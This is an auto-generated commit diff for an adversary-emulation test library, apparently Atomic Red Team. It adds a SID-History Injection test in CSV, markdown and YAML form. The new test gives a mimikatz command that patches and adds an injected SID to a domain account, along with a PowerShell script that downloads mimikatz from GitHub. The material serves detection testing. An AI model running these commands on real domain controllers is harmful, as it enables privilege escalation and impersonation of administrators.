Generated docs from job=generate-docs branch=master [ci skip]

2022-04-28 01:34:38 +00:00
parent 96fb67db9f
commit 667cfa7daa
10 changed files with 187 additions and 12 deletions
@@ -250,6 +250,7 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious b
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
+privilege-escalation,T1134.005,SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -614,6 +615,7 @@ defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and p
 defense-evasion,T1218.011,Rundll32,9,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
 defense-evasion,T1218.011,Rundll32,10,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
 defense-evasion,T1218.011,Rundll32,11,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
+defense-evasion,T1134.005,SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
 defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
@@ -170,6 +170,7 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious b
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
+privilege-escalation,T1134.005,SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -435,6 +436,7 @@ defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and p
 defense-evasion,T1218.011,Rundll32,9,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
 defense-evasion,T1218.011,Rundll32,10,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
 defense-evasion,T1218.011,Rundll32,11,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
+defense-evasion,T1134.005,SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
 defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
@@ -418,7 +418,8 @@
  - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
  - Atomic Test #8: Add persistance via Recycle bin [windows]
  - Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1134.005 SID-History Injection](../../T1134.005/T1134.005.md)
+  - Atomic Test #1: Injection SID-History with mimikatz [windows]
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
  - Atomic Test #1: Scheduled Task Startup Script [windows]
  - Atomic Test #2: Scheduled task Local [windows]
@@ -939,7 +940,8 @@
  - Atomic Test #9: Execution of non-dll using rundll32.exe [windows]
  - Atomic Test #10: Rundll32 with Ordinal Value [windows]
  - Atomic Test #11: Rundll32 with Control_RunDLL [windows]
- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1134.005 SID-History Injection](../../T1134.005/T1134.005.md)
+  - Atomic Test #1: Injection SID-History with mimikatz [windows]
 - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.009 Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -302,7 +302,8 @@
  - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
  - Atomic Test #8: Add persistance via Recycle bin [windows]
  - Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1134.005 SID-History Injection](../../T1134.005/T1134.005.md)
+  - Atomic Test #1: Injection SID-History with mimikatz [windows]
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
  - Atomic Test #1: Scheduled Task Startup Script [windows]
  - Atomic Test #2: Scheduled task Local [windows]
@@ -684,7 +685,8 @@
  - Atomic Test #9: Execution of non-dll using rundll32.exe [windows]
  - Atomic Test #10: Rundll32 with Ordinal Value [windows]
  - Atomic Test #11: Rundll32 with Control_RunDLL [windows]
- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1134.005 SID-History Injection](../../T1134.005/T1134.005.md)
+  - Atomic Test #1: Injection SID-History with mimikatz [windows]
 - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.009 Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -73,7 +73,7 @@
 |  |  | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | [Indicator Removal on Host](../../T1070/T1070.md) |  |  |  |  |  |  |  |
 |  |  | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Indirect Command Execution](../../T1202/T1202.md) |  |  |  |  |  |  |  |
 |  |  | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) |  |  |  |  |  |  |  |
-|  |  | [Plist Modification](../../T1547.011/T1547.011.md) | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [InstallUtil](../../T1218.004/T1218.004.md) |  |  |  |  |  |  |  |
+|  |  | [Plist Modification](../../T1547.011/T1547.011.md) | [SID-History Injection](../../T1134.005/T1134.005.md) | [InstallUtil](../../T1218.004/T1218.004.md) |  |  |  |  |  |  |  |
 |  |  | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Port Monitors](../../T1547.010/T1547.010.md) | [Screensaver](../../T1546.002/T1546.002.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) |  |  |  |  |  |  |  |
@@ -131,7 +131,7 @@
 |  |  |  |  | [Rootkit](../../T1014/T1014.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Run Virtual Instance](../../T1564.006/T1564.006.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Rundll32](../../T1218.011/T1218.011.md) |  |  |  |  |  |  |  |
-|  |  |  |  | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [SID-History Injection](../../T1134.005/T1134.005.md) |  |  |  |  |  |  |  |
 |  |  |  |  | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -53,7 +53,7 @@
 |  |  | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | Impair Command History Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  |  |  |
-|  |  | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [SID-History Injection](../../T1134.005/T1134.005.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Indicator Removal on Host](../../T1070/T1070.md) |  |  |  |  |  |  |  |
 |  |  | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indirect Command Execution](../../T1202/T1202.md) |  |  |  |  |  |  |  |
 |  |  | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) |  |  |  |  |  |  |  |
@@ -100,7 +100,7 @@
 |  |  |  |  | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Run Virtual Instance](../../T1564.006/T1564.006.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Rundll32](../../T1218.011/T1218.011.md) |  |  |  |  |  |  |  |
-|  |  |  |  | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [SID-History Injection](../../T1134.005/T1134.005.md) |  |  |  |  |  |  |  |
 |  |  |  |  | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -18958,7 +18958,56 @@ privilege-escalation:
        description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
          30, 2017.
        url: https://msdn.microsoft.com/library/ms677982.aspx
-    atomic_tests: []
+      identifier: T1134.005
+    atomic_tests:
+    - name: Injection SID-History with mimikatz
+      auto_generated_guid: 6bef32e5-9456-4072-8f14-35566fb85401
+      description: 'Adversaries may use SID-History Injection to escalate privileges
+        and bypass access controls. Must be run on domain controller
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        sid_to_inject:
+          description: SID to inject into sidhistory
+          type: String
+          default: S-1-5-21-1004336348-1177238915-682003330-1134
+        sam_account_name:
+          description: Target account to modify
+          type: String
+          default: "$env:username"
+        mimikatz_path:
+          description: Mimikatz windows executable
+          type: Path
+          default: "$env:TEMP\\mimikatz\\x64\\mimikatz.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Mimikatz executor must exist on disk and at specified location
+          (#{mimikatz_path})
+
+          '
+        prereq_command: |
+          $mimikatz_path = cmd /c echo #{mimikatz_path}
+          if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          $mimikatz_path = cmd /c echo #{mimikatz_path}
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
+          Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
+          New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
+          Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: '#{mimikatz_path} "privilege::debug" "sid::patch" "sid::add /sid:#{sid_to_inject}
+          /sam:#{sam_account_name}" "exit"
+
+          '
+        cleanup_command: '#{mimikatz_path} "sid::clear /sam:#{sam_account_name}" "exit"
+
+          '
  T1053.005:
    technique:
      type: attack-pattern
@@ -39480,7 +39529,56 @@ defense-evasion:
        description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
          30, 2017.
        url: https://msdn.microsoft.com/library/ms677982.aspx
-    atomic_tests: []
+      identifier: T1134.005
+    atomic_tests:
+    - name: Injection SID-History with mimikatz
+      auto_generated_guid: 6bef32e5-9456-4072-8f14-35566fb85401
+      description: 'Adversaries may use SID-History Injection to escalate privileges
+        and bypass access controls. Must be run on domain controller
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        sid_to_inject:
+          description: SID to inject into sidhistory
+          type: String
+          default: S-1-5-21-1004336348-1177238915-682003330-1134
+        sam_account_name:
+          description: Target account to modify
+          type: String
+          default: "$env:username"
+        mimikatz_path:
+          description: Mimikatz windows executable
+          type: Path
+          default: "$env:TEMP\\mimikatz\\x64\\mimikatz.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Mimikatz executor must exist on disk and at specified location
+          (#{mimikatz_path})
+
+          '
+        prereq_command: |
+          $mimikatz_path = cmd /c echo #{mimikatz_path}
+          if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          $mimikatz_path = cmd /c echo #{mimikatz_path}
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
+          Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
+          New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
+          Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: '#{mimikatz_path} "privilege::debug" "sid::patch" "sid::add /sid:#{sid_to_inject}
+          /sam:#{sam_account_name}" "exit"
+
+          '
+        cleanup_command: '#{mimikatz_path} "sid::clear /sam:#{sam_account_name}" "exit"
+
+          '
  T1553.003:
    technique:
      object_marking_refs:
@@ -0,0 +1,69 @@
+# T1134.005 - SID-History Injection
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1134/005)
+<blockquote>Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
+
+With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Injection SID-History with mimikatz](#atomic-test-1---injection-sid-history-with-mimikatz)
+
+
+<br/>
+
+## Atomic Test #1 - Injection SID-History with mimikatz
+Adversaries may use SID-History Injection to escalate privileges and bypass access controls. Must be run on domain controller
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 6bef32e5-9456-4072-8f14-35566fb85401
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| sid_to_inject | SID to inject into sidhistory | String | S-1-5-21-1004336348-1177238915-682003330-1134|
+| sam_account_name | Target account to modify | String | $env:username|
+| mimikatz_path | Mimikatz windows executable | Path | $env:TEMP&#92;mimikatz&#92;x64&#92;mimikatz.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+#{mimikatz_path} "privilege::debug" "sid::patch" "sid::add /sid:#{sid_to_inject} /sam:#{sam_account_name}" "exit"
+```
+
+#### Cleanup Commands:
+```cmd
+#{mimikatz_path} "sid::clear /sam:#{sam_account_name}" "exit"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
+##### Check Prereq Commands:
+```powershell
+$mimikatz_path = cmd /c echo #{mimikatz_path}
+if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+$mimikatz_path = cmd /c echo #{mimikatz_path}
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
+Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
+New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
+Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
+```
+
+
+
+
+<br/>